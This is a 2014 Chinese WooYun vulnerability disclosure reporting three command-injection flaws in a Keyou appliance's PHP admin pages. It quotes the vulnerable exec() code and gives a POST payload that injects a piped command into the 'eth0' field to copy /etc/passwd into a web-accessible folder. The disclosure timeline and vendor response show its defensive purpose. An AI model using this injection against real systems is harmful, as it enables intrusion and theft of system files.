2014-03-05:细节已通知厂商并且等待厂商处理中
2014-03-10:厂商已经确认,细节仅向厂商公开
2014-03-13:细节向第三方安全合作伙伴开放
2014-03-20:细节向核心白帽子及相关领域专家公开
2014-03-30:细节向普通白帽子公开
2014-04-19:细节向实习白帽子公开
2014-06-03:细节向公众公开
三处可执行漏洞的地方。版本和上次的版本是一样的
上一发:http://www.wooyun.org/bugs/wooyun-2014-051345
这次也还是在内网测试的。
第一处来一个执行可回显的(写shell请自行研究):
system\sys_ping.php
if(!empty($_POST['IP_addr']))
{
$cmd = "ping -c 4 -s 32 ".$_POST['IP_addr']; //问题参数IP_addr
exec($cmd, $list);
flush();
for($i=0;$i < count($list);$i++)
{
$row[$i]['list_msg'] = $list[$i];
}
$st->assign('pingip_value',$_POST['IP_addr']);
$st->assign('msg',$row);
}
$st->assign('nav_title', '系统管理>>网络配置>>Ping功能');
$st->assign('h1','sys_ping');
$st->output();
第二处:
system\tcpdump.php
if(!empty($_POST['eth0']))
{
$filename0="/tmp/".$_POST['eth0']."_".$data['0'].".tcp"; //eth0,其实下面还有其它参数的,雷同
//echo $filename0;
exec(MYSUDO."/usr/sbin/tcpdump -i eth0 -c $package -w $filename0 > /tmp/null &");
}
Post:
https://1.1.1.1/system/tcpdump.php
op_type=downloadcatchð0=1 | cp /etc/passwd /usr/local/apache2/htdocs/project/www/upload/123.txt | 1&dump=
最后这里不具体测试了。给出代码例子
system\sys_basic.php
function CliIP($URL,$stat,$ipstr)
{
exec(MYSUDO."chown -R daemon:daemon".$URL);
if(file_exists($URL)){
exec(MYSUDO."sh ".$URL." ".$stat." ".$ipstr,$output,$er);
return $output[count($output)-1];
}
}
//MAC地址绑定
if(!empty($_POST['flag']) && $_GET['show_flag'] > 0)
{
switch($_POST['flag']) {
case '1':
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','add',$_POST['IP']." ".$_POST['MAC']); //调用的这有问题。
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -1;
break;
case '2':
//echo $_POST['MACstr'];
$AA=CliIP('/usr/local/keyou/Bin/bindmac.sh','del',$_POST['MACstr']);
if($AA)
$bindmac_flag = $AA;
else
$bindmac_flag = -2;
break;
}
}
修复方案:
版权声明:转载请注明来源 wefgod@乌云 漏洞回应 厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-03-10 21:05
厂商回复:CNVD确认所述漏洞机理,未在实例上进行复现,已经由CNVD通过直接联系渠道转报给江南科友公司,由其后续处置。
最新状态:暂无